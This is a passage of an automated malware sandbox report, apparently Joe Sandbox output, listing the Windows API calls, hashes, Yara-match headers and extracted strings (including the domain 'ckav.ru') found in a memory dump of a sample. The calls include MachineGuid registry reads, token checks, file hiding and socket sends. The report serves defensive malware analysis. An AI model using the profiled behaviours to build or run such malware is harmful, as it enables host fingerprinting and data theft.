                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 3672724799-0
                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                              • String ID: ckav.ru
                                              • API String ID: 2915393847-2696028687
                                              • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                              • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • _wmemset.LIBCMT ref: 0040634F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess_wmemset
                                              • String ID: CA
                                              • API String ID: 2773065342-1052703068
                                              • Opcode ID: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                              • Opcode Fuzzy Hash: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InformationToken
                                              • String ID: IDA
                                              • API String ID: 4114910276-365204570
                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: s1@
                                              • API String ID: 190572456-427247929
                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 1425999871-0
                                              • Opcode ID: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                              • Opcode Fuzzy Hash: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CheckMembershipToken
                                              • String ID:
                                              • API String ID: 1351025785-0
                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID:
                                              • API String ID: 1174141254-0
                                              • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                              • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: closesocket
                                              • String ID:
                                              • API String ID: 2781271927-0
                                              • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                              • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                              • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                              • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                              • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                              • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040438F
                                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                              • VariantInit.OLEAUT32(?), ref: 004043C4
                                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                                              • VariantInit.OLEAUT32(?), ref: 00404414
                                              • SysAllocString.OLEAUT32(?), ref: 00404419
                                              • VariantInit.OLEAUT32(?), ref: 00404431
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                                              • String ID:
                                              • API String ID: 1312198159-0
                                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
